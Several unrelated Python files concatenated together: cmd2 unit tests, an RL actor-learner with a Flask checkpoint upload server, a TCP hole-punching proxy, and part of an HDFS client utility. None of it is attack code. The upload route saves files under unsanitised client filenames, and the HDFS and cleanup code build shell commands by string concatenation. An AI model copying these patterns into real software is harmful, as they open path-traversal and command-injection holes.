assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_pouterr_always_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some escape sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
# if colors are on, the output should have some escape sequences in it
out, err = capsys.readouterr()
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
class DisableCommandsApp(cmd2.Cmd):
"""Class for disabling commands"""
category_name = "Test Category"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category(category_name)
def do_has_helper_funcs(self, arg):
self.poutput("The real has_helper_funcs")
def help_has_helper_funcs(self):
self.poutput('Help for has_helper_funcs')
def complete_has_helper_funcs(self, *args):
return ['result']
@cmd2.with_category(category_name)
def do_has_no_helper_funcs(self, arg):
"""Help for has_no_helper_funcs"""
self.poutput("The real has_no_helper_funcs")
@pytest.fixture
def disable_commands_app():
app = DisableCommandsApp()
return app
def test_disable_and_enable_category(disable_commands_app):
##########################################################################
# Disable the category
##########################################################################
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_category(disable_commands_app.category_name, message_to_print)
# Make sure all the commands and help on those commands displays the message
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert err[0].startswith(message_to_print)
# Make sure neither function completes
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are invisible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' not in visible_commands
assert 'has_no_helper_funcs' not in visible_commands
# Make sure get_help_topics() filters out disabled commands
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' not in help_topics
##########################################################################
# Enable the category
##########################################################################
disable_commands_app.enable_category(disable_commands_app.category_name)
# Make sure all the commands and help on those commands are restored
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert out[0] == "The real has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert out[0] == "Help for has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert out[0] == "The real has_no_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert out[0] == "Help for has_no_helper_funcs"
# has_helper_funcs should complete now
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is not None and disable_commands_app.completion_matches == ['result ']
# has_no_helper_funcs had no completer originally, so there should be no results
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are visible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' in visible_commands
assert 'has_no_helper_funcs' in visible_commands
# Make sure get_help_topics() contains our help function
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' in help_topics
def test_enable_enabled_command(disable_commands_app):
# Test enabling a command that is not disabled
saved_len = len(disable_commands_app.disabled_commands)
disable_commands_app.enable_command('has_helper_funcs')
# The number of disabled_commands should not have changed
assert saved_len == len(disable_commands_app.disabled_commands)
def test_disable_fake_command(disable_commands_app):
with pytest.raises(AttributeError):
disable_commands_app.disable_command('fake', 'fake message')
def test_disable_command_twice(disable_commands_app):
saved_len = len(disable_commands_app.disabled_commands)
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
# The length of disabled_commands should have increased one
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len - 1
saved_len = new_len
# Disable again and the length should not change
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len
def test_disabled_command_not_in_history(disable_commands_app):
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
saved_len = len(disable_commands_app.history)
run_cmd(disable_commands_app, 'has_helper_funcs')
assert saved_len == len(disable_commands_app.history)
def test_disabled_message_command_name(disable_commands_app):
message_to_print = '{} is currently disabled'.format(COMMAND_NAME)
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith('has_helper_funcs is currently disabled')
def test_startup_script(request):
test_dir = os.path.dirname(request.module.__file__)
startup_script = os.path.join(test_dir, '.cmd2rc')
app = cmd2.Cmd(allow_cli_args=False, startup_script=startup_script)
assert len(app._startup_commands) == 1
assert app._startup_commands[0] == "run_script '{}'".format(startup_script)
app._startup_commands.append('quit')
app.cmdloop()
out, err = run_cmd(app, 'alias list')
assert len(out) > 1
assert 'alias create ls' in out[0]
def test_transcripts_at_init():
transcript_files = ['foo', 'bar']
app = cmd2.Cmd(allow_cli_args=False, transcript_files=transcript_files)
assert app._transcript_files == transcript_files
|
paac.py
|
import time, logging, zmq, re
from flask import Flask, request
from multiprocessing.sharedctypes import RawArray
from ctypes import c_uint, c_float
from actor_learner import *
from emulator_runner import EmulatorRunner
from runners import Runners
from zmq_serialize import SerializingContext
from multiprocessing import Queue
flask_file_server = Flask(__name__)
@flask_file_server.route('/d3rl/network', methods=['POST'])
def upload_network():
network_ckpt = request.files.getlist('files')
file_num, ckpt_num = 0, ""
for f in network_ckpt:
f.save("/root/D3RL_ZMQ_Vtrace/logs/upload/" + f.filename)
file_num += 1
if ckpt_num == "":
ckpt_num = f.filename.split(".")[0]
with open("/root/D3RL_ZMQ_Vtrace/logs/upload/checkpoint", "w") as f:
f.writelines(["model_checkpoint_path: \"" + ckpt_num + "\"\n",
"all_model_checkpoint_paths: \"" + ckpt_num + "\""])
return '{"code":"ok","file_num":%d}' % file_num
def send_zmq_batch_data(queue):
ctx = SerializingContext()
req = ctx.socket(zmq.REQ)
req.connect("tcp://127.0.0.1:6666")
while True:
data = queue.get()
req.send_zipped_pickle(data)
msg = req.recv_string()
if msg == "stop":
break
req.close()
class PAACLearner(ActorLearner):
def __init__(self, network_creator, environment_creator, args):
super(PAACLearner, self).__init__(network_creator, environment_creator, args)
self.workers = args.emulator_workers
self.latest_ckpt = "-0"
self.send_batch_queue = Queue()
self.flask_file_server_proc = Process(target=flask_file_server.run,
kwargs={'host': '127.0.0.1', 'port': 6668})
self.send_zmq_batch_data_proc = Process(target=send_zmq_batch_data, kwargs={'queue': self.send_batch_queue})
@staticmethod
def choose_next_actions(network, num_actions, states, session):
network_output_v, network_output_pi = session.run(
[network.output_layer_v,
network.output_layer_pi],
feed_dict={network.input_ph: states})
action_indices = PAACLearner.__sample_policy_action(network_output_pi)
new_actions = np.eye(num_actions)[action_indices]
return new_actions, network_output_v, network_output_pi
def __choose_next_actions(self, states):
return PAACLearner.choose_next_actions(self.network, self.num_actions, states, self.session)
@staticmethod
def __sample_policy_action(probs):
"""
Sample an action from an action probability distribution output by
the policy network.
"""
# Subtract a tiny value from probabilities in order to avoid
# "ValueError: sum(pvals[:-1]) > 1.0" in numpy.multinomial
probs = probs - np.finfo(np.float32).epsneg
action_indexes = [int(np.nonzero(np.random.multinomial(1, p))[0]) for p in probs]
return action_indexes
def _get_shared(self, array, dtype=c_float):
"""
Returns a RawArray backed numpy array that can be shared between processes.
:param array: the array to be shared
:param dtype: the RawArray dtype to use
:return: the RawArray backed numpy array
"""
shape = array.shape
shared = RawArray(dtype, array.reshape(-1))
return np.frombuffer(shared, dtype).reshape(shape)
def train(self):
self.flask_file_server_proc.start()
self.send_zmq_batch_data_proc.start()
"""
Main actor learner loop for parallel advantage actor critic learning.
"""
self.global_step = self.init_network()
logging.debug("Starting training at Step {}".format(self.global_step))
counter = 0
global_step_start = self.global_step
total_rewards = []
# state, reward, episode_over, action
variables = [(np.asarray([emulator.get_initial_state() for emulator in self.emulators], dtype=np.uint8)),
(np.zeros(self.emulator_counts, dtype=np.float32)),
(np.asarray([False] * self.emulator_counts, dtype=np.float32)),
(np.zeros((self.emulator_counts, self.num_actions), dtype=np.float32))]
self.runners = Runners(EmulatorRunner, self.emulators, self.workers, variables)
self.runners.start()
shared_states, shared_rewards, shared_episode_over, shared_actions = self.runners.get_shared_variables()
summaries_op = tf.summary.merge_all()
emulator_steps = [0] * self.emulator_counts
total_episode_rewards = self.emulator_counts * [0]
actions_sum = np.zeros((self.emulator_counts, self.num_actions))
y_batch = np.zeros((self.max_local_steps, self.emulator_counts))
adv_batch = np.zeros((self.max_local_steps, self.emulator_counts))
rewards = np.zeros((self.max_local_steps, self.emulator_counts))
states = np.zeros([self.max_local_steps + 1] + list(shared_states.shape), dtype=np.uint8)
actions = np.zeros((self.max_local_steps, self.emulator_counts, self.num_actions))
values = np.zeros((self.max_local_steps, self.emulator_counts))
episodes_over_masks = np.zeros((self.max_local_steps, self.emulator_counts))
start_time = time.time()
while self.global_step < self.max_global_steps:
loop_start_time = time.time()
max_local_steps = self.max_local_steps
for t in range(max_local_steps):
next_actions, readouts_v_t, readouts_pi_t = self.__choose_next_actions(shared_states)
actions_sum += next_actions
for z in range(next_actions.shape[0]):
shared_actions[z] = next_actions[z]
actions[t] = next_actions
values[t] = readouts_v_t
states[t] = shared_states
# Start updating all environments with next_actions
self.runners.update_environments()
self.runners.wait_updated()
# Done updating all environments, have new states, rewards and is_over
episodes_over_masks[t] = 1.0 - shared_episode_over.astype(np.float32)
for e, (actual_reward, episode_over) in enumerate(zip(shared_rewards, shared_episode_over)):
total_episode_rewards[e] += actual_reward
actual_reward = self.rescale_reward(actual_reward)
rewards[t, e] = actual_reward
emulator_steps[e] += 1
self.global_step += 1
if episode_over:
total_rewards.append(total_episode_rewards[e])
episode_summary = tf.Summary(value=[
tf.Summary.Value(tag='rl/reward', simple_value=total_episode_rewards[e]),
tf.Summary.Value(tag='rl/episode_length', simple_value=emulator_steps[e]),
])
self.summary_writer.add_summary(episode_summary, self.global_step)
self.summary_writer.flush()
total_episode_rewards[e] = 0
emulator_steps[e] = 0
actions_sum[e] = np.zeros(self.num_actions)
states[-1] = shared_states
self.send_batch_queue.put([states, rewards, episodes_over_masks, actions, values])
# states: (5,32,84,84,4), rewards: (5,32), over: (5,32), actions: (5,32,6)
counter += 1
if counter % (2048 / self.emulator_counts) == 0:
curr_time = time.time()
global_steps = self.global_step
last_ten = 0.0 if len(total_rewards) < 1 else np.mean(total_rewards[-10:])
logging.info("Ran {} steps, at {} steps/s ({} steps/s avg), last 10 rewards avg {}"
.format(global_steps,
self.max_local_steps * self.emulator_counts / (curr_time - loop_start_time),
(global_steps - global_step_start) / (curr_time - start_time),
last_ten))
""" restore network if there's new checkpoint from GPU-Learner
"""
try:
cur_ckpt = tf.train.latest_checkpoint(self.upload_checkpoint_folder)
if cur_ckpt and self.latest_ckpt != cur_ckpt:
self.network_saver.restore(self.session, cur_ckpt)
if os.path.exists("/root/D3RL_ZMQ_Vtrace/logs/upload/" + str(self.latest_ckpt) + ".meta"):
os.system(
"rm /root/D3RL_ZMQ_Vtrace/logs/upload/" + str(
self.latest_ckpt) + ".data-00000-of-00001")
os.system("rm /root/D3RL_ZMQ_Vtrace/logs/upload/" + str(self.latest_ckpt) + ".index")
os.system("rm /root/D3RL_ZMQ_Vtrace/logs/upload/" + str(self.latest_ckpt) + ".meta")
self.latest_ckpt = cur_ckpt
except ValueError: # if the checkpoint is written: state error
pass
self.cleanup()
def cleanup(self):
super(PAACLearner, self).cleanup()
self.runners.stop()
self.flask_file_server_proc.terminate()
self.send_zmq_batch_data_proc.terminate()
|
tcp_client.py
|
#!/usr/bin/env python
from threading import Event, Thread
from util import *
import sys
import logging
import socket
import struct
logger = logging.getLogger('client')
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
class TcpClient:
def __init__(self, stun_host, stun_port):
self.stun_host = stun_host
self.stun_port = stun_port
def accept(self, port):
logger.info("accept %s", port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.listen(1)
s.settimeout(5)
while not self.stop.is_set():
try:
conn, addr = s.accept()
except socket.timeout:
continue
else:
logger.info("Accept %s connected!", port)
return
def connect(self, local_addr, addr):
logger.info("connect from %s to %s", local_addr, addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(local_addr)
s.settimeout(2)
while not self.stop.is_set():
try:
s.connect(addr)
except socket.timeout:
continue
except socket.error:
continue
logger.info("connected from %s to %s success!", local_addr, addr)
self.stop.set()
return s
def tcp_punch(self):
self.stop = Event()
sa = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sa.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sa.connect((self.stun_host, self.stun_port))
priv_addr = sa.getsockname()
send_msg(sa, addr_to_msg(priv_addr))
data = recv_msg(sa)
logger.info("client %s %s - received data: %s", priv_addr[0], priv_addr[1], data)
pub_addr = msg_to_addr(data)
send_msg(sa, addr_to_msg(pub_addr))
data = recv_msg(sa)
pubdata, privdata = data.split(b'|')
client_pub_addr = msg_to_addr(pubdata)
client_priv_addr = msg_to_addr(privdata)
logger.info(
"client public is %s and private is %s, peer public is %s private is %s",
pub_addr, priv_addr, client_pub_addr, client_priv_addr,
)
try:
accept_thread = Thread(target=TcpClient.accept, args=(self, client_pub_addr[1],))
accept_thread.start()
return self.connect(priv_addr, client_pub_addr)
finally:
accept_thread.join()
def sending_worker(self, a, b):
try:
while True:
try:
data = a.recv(4096)
except socket.timeout:
if self.stop.is_set():
return
continue
if not data:
break
b.sendall(data)
except Exception as e:
print('Exception', e)
finally:
self.stop.set()
def proxy(self, s1, s2):
self.stop = Event()
t1 = Thread(target=TcpClient.sending_worker, args=(self, s2, s1))
t2 = Thread(target=TcpClient.sending_worker, args=(self, s1, s2))
t1.start()
t2.start()
t1.join()
t2.join()
s1.close()
s2.close()
def start_client(self, ip, port):
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.bind((ip, port))
client_sock.listen()
try:
while True:
print('awaiting connection on', ip, port)
client_conn, addr = client_sock.accept()
client_conn.settimeout(2)
print('>>>>> received local connection', addr)
server_sock = self.tcp_punch()
server_sock.send(b'\0')
print(server_sock.recv(1))
self.proxy(client_conn, server_sock)
finally:
client_sock.close()
def start_server(self, ip, port):
while True:
client_sock = self.tcp_punch()
client_sock.send(b'\0')
print(client_sock.recv(1))
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.settimeout(2)
server_sock.connect((ip, port))
self.proxy(client_sock, server_sock)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, message='%(asctime)s %(message)s')
c = TcpClient(*addr_from_args(sys.argv[1:]))
if sys.argv[1] == 'client':
c.start_client('localhost', 12345)
elif sys.argv[1] == 'server':
c.start_server('localhost', 12345)
|
hdfs_utils.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""hdfs_utils.py will move to fluid/incubate/fleet/utils/hdfs.py"""
import os
import sys
import subprocess
import multiprocessing
from datetime import datetime
import re
import copy
import errno
import logging
from paddle.fluid.log_helper import get_logger
__all__ = ["HDFSClient", "multi_download", "multi_upload"]
_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class HDFSClient(object):
"""
A tool of HDFS
Args:
hadoop_home (string): hadoop_home
configs (dict): hadoop config, it is a dict, please contain \
key "fs.default.name" and "hadoop.job.ugi"
Can be a float value
Examples:
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
"""
def __init__(self, hadoop_home, configs):
self.pre_commands = []
hadoop_bin = '%s/bin/hadoop' % hadoop_home
self.pre_commands.append(hadoop_bin)
dfs = 'fs'
self.pre_commands.append(dfs)
for k, v in configs.items():
config_command = '-D%s=%s' % (k, v)
self.pre_commands.append(config_command)
def __run_hdfs_cmd(self, commands, retry_times=5):
whole_commands = copy.deepcopy(self.pre_commands)
whole_commands.extend(commands)
print('Running system command: {0}'.format(' '.join(whole_commands)))
ret_code = 0
ret_out = None
ret_err = None
whole_commands = " ".join(whole_commands)
for x in range(retry_times + 1):
proc = subprocess.Popen(
whole_commands,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(output, errors) = proc.communicate()
ret_code, ret_out, ret_err = proc.returncode, output, errors
if ret_code:
_logger.warn(
'Times: %d, Error running command: %s. Return code: %d, Error: %s'
% (x, ' '.join(whole_commands), proc.returncode, errors))
else:
break
return ret_code, ret_out, ret_err
def upload(self, hdfs_path, local_path, overwrite=False, retry_times=5):
"""
upload the local file to hdfs
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
retry_times(int|5): retry times
Returns:
True or False
"""
assert hdfs_path is not None
assert local_path is not None and os.path.exists(local_path)
if os.path.isdir(local_path):
_logger.warn(
"The Local path: {} is dir and I will support it later, return".
format(local_path))
return False
base = os.path.basename(local_path)
if not self.is_exist(hdfs_path):
self.makedirs(hdfs_path)
else:
if self.is_exist(os.path.join(hdfs_path, base)):
if overwrite:
_logger.error(
"The HDFS path: {} is exist and overwrite is True, delete it".
format(hdfs_path))
self.delete(hdfs_path)
else:
_logger.error(
"The HDFS path: {} is exist and overwrite is False, return".
format(hdfs_path))
return False
put_commands = ["-put", local_path, hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(put_commands,
retry_times)
if returncode:
_logger.error("Put local path: {} to HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Put local path: {} to HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def download(self, hdfs_path, local_path, overwrite=False, unzip=False):
"""
download file from HDFS
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
unzip(bool|False): if the download file is compressed by zip, unzip it or not.
Returns:
True or False
"""
_logger.info('Downloading %r to %r.', hdfs_path, local_path)
_logger.info('Download of %s to %r complete.', hdfs_path, local_path)
if not self.is_exist(hdfs_path):
print("HDFS path: {} do not exist".format(hdfs_path))
return False
if self.is_dir(hdfs_path):
_logger.error(
"The HDFS path: {} is dir and I will support it later, return".
format(hdfs_path))
if os.path.exists(local_path):
base = os.path.basename(hdfs_path)
local_file = os.path.join(local_path, base)
if os.path.exists(local_file):
if overwrite:
os.remove(local_file)
else:
_logger.error(
"The Local path: {} is exist and overwrite is False, return".
format(local_file))
return False
self.make_local_dirs(local_path)
download_commands = ["-get", hdfs_path, local_path]
returncode, output, errors = self.__run_hdfs_cmd(download_commands)
if returncode:
_logger.error("Get local path: {} from HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Get local path: {} from HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def is_exist(self, hdfs_path=None):
"""
whether the remote HDFS path exists
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
exist_cmd = ['-test', '-e', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
exist_cmd, retry_times=1)
if returncode:
_logger.error("HDFS is_exist HDFS path: {} failed".format(
hdfs_path))
return False
else:
_logger.info("HDFS is_exist HDFS path: {} successfully".format(
hdfs_path))
return True
def is_dir(self, hdfs_path=None):
"""
whether the remote HDFS path is directory
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
if not self.is_exist(hdfs_path):
return False
dir_cmd = ['-test', '-d', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(dir_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path: {} failed is not a directory".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} successfully is a directory".format(
hdfs_path))
return True
def delete(self, hdfs_path):
"""
Remove a file or directory from HDFS.
whether the remote HDFS path exists
Args:
hdfs_path: HDFS path.
Returns:
True or False
This function returns `True` if the deletion was successful and `False` if
no file or directory previously existed at `hdfs_path`.
"""
_logger.info('Deleting %r.', hdfs_path)
if not self.is_exist(hdfs_path):
_logger.warn("HDFS path: {} do not exist".format(hdfs_path))
return True
if self.is_dir(hdfs_path):
del_cmd = ['-rmr', hdfs_path]
else:
del_cmd = ['-rm', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(del_cmd, retry_times=0)
if returncode:
_logger.error("HDFS path: {} delete files failure".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} delete files successfully".format(
hdfs_path))
return True
def rename(self, hdfs_src_path, hdfs_dst_path, overwrite=False):
"""
Move a file or folder on HDFS.
Args:
hdfs_path(str): HDFS path.
overwrite(bool|False): If the path already exists and overwrite is False, will return False.
Returns:
True or False
"""
assert hdfs_src_path is not None
assert hdfs_dst_path is not None
if not self.is_exist(hdfs_src_path):
_logger.info("HDFS path do not exist: {}".format(hdfs_src_path))
if self.is_exist(hdfs_dst_path) and not overwrite:
_logger.error("HDFS path is exist: {} and overwrite=False".format(
hdfs_dst_path))
rename_command = ['-mv', hdfs_src_path, hdfs_dst_path]
returncode, output, errors = self.__run_hdfs_cmd(
rename_command, retry_times=1)
if returncode:
_logger.error("HDFS rename path: {} to {} failed".format(
hdfs_src_path, hdfs_dst_path))
return False
else:
_logger.info("HDFS rename path: {} to {} successfully".format(
hdfs_src_path, hdfs_dst_path))
return True
@staticmethod
def make_local_dirs(local_path):
"""
create a directiory local, is same to mkdir
Args:
local_path: local path that wants to create a directiory.
"""
try:
os.makedirs(local_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def makedirs(self, hdfs_path):
"""
Create a remote directory, recursively if necessary.
Args:
hdfs_path(str): Remote path. Intermediate directories will be created appropriately.
Returns:
True or False
"""
_logger.info('Creating directories to %r.', hdfs_path)
assert hdfs_path is not None
if self.is_exist(hdfs_path):
_logger.error("HDFS path is exist: {}".format(hdfs_path))
return
mkdirs_commands = ['-mkdir', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
mkdirs_commands, retry_times=1)
if returncode:
_logger.error("HDFS mkdir path: {} failed".format(hdfs_path))
return False
else:
_logger.error("HDFS mkdir path: {} successfully".format(hdfs_path))
return True
def ls(self, hdfs_path):
"""
ls directory contents about HDFS hdfs_path
Args:
hdfs_path(str): Remote HDFS path will be ls.
Returns:
List: a contents list about hdfs_path.
"""
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-ls', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list path: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list path: {} successfully".format(hdfs_path))
ret_lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
ret_lines.append(re_line[7])
return ret_lines
def lsr(self, hdfs_path, only_file=True, sort=True):
"""
list directory contents about HDFS hdfs_path recursively
Args:
hdfs_path(str): Remote HDFS path.
only_file(bool|True): will discard folders.
sort(bool|True): will be sorted by create time.
Returns:
List: a contents list about hdfs_path.
"""
def sort_by_time(v1, v2):
v1_time = datetime.strptime(v1[1], '%Y-%m-%d %H:%M')
v2_time = datetime.strptime(v2[1], '%Y-%m-%d %H:%M')
return v1_time > v2_time
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-lsr', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list all files: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list all files: {} successfully".format(
hdfs_path))
lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
if only_file and re_line[0][0] == "d":
continue
else:
lines.append(
(re_line[7], re_line[5] + " " + re_line[6]))
if sort:
sorted(lines, cmp=sort_by_time)
ret_lines = [ret[0] for ret in lines]
return ret_lines
def multi_download(client,
hdfs_path,
local_path,
trainer_id,
trainers,
multi_processes=5):
"""
Download files from HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
trainer_id(int): current trainer id
trainers(int): all trainers number
multi_processes(int|5): the download data process at the same time, default=5
Returns:
List:
Download files in local folder.
"""
def __subprocess_download(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
sub_local_re_path = local_path
else:
sub_local_re_path = os.path.join(local_path, re_path)
client.download(data, sub_local_re_path)
assert isinstance(client, HDFSClient)
client.make_local_dirs(local_path)
_logger.info("Make local dir {} successfully".format(local_path))
all_need_download = client.lsr(hdfs_path, sort=True)
need_download = all_need_download[trainer_id::trainers]
_logger.info("Get {} files From all {} files need to be download from {}".
format(len(need_download), len(all_need_download), hdfs_path))
_logger.info("Start {} multi process to download datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = need_download[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_download, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to download datas".format(
multi_processes))
local_downloads = []
for data in need_download:
data_name = os.path.basename(data)
re_path = os.path.relpath(os.path.dirname(data), hdfs_path)
if re_path == os.curdir:
local_re_path = os.path.join(local_path, data_name)
else:
local_re_path = os.path.join(local_path, re_path, data_name)
local_downloads.append(local_re_path)
return local_downloads
def getfilelist(path):
rlist = []
for dir, folder, file in os.walk(path):
for i in file:
t = os.path.join(dir, i)
rlist.append(t)
for r in rlist:
print(r)
def multi_upload(client,
hdfs_path,
local_path,
multi_processes=5,
overwrite=False,
sync=True):
"""
Upload files to HDFS using multi process.
Args:
client(HDFSClient): instance of HDFSClient
hdfs_path(str): path on hdfs
local_path(str): path on local
multi_processes(int|5): the upload data process at the same time, default=5
overwrite(bool|False): will overwrite file on HDFS or not
sync(bool|True): upload files sync or not.
Returns:
None
"""
def __subprocess_upload(datas):
for data in datas:
re_path = os.path.relpath(os.path.dirname(data), local_path)
hdfs_re_path = os.path.join(hdfs_path, re_path)
client.upload(hdfs_re_path, data, overwrite, retry_times=5)
def get_local_files(path):
rlist = []
if not os.path.isdir(path):
return rlist
for dirname, folder, files in os.walk(path):
for i in files:
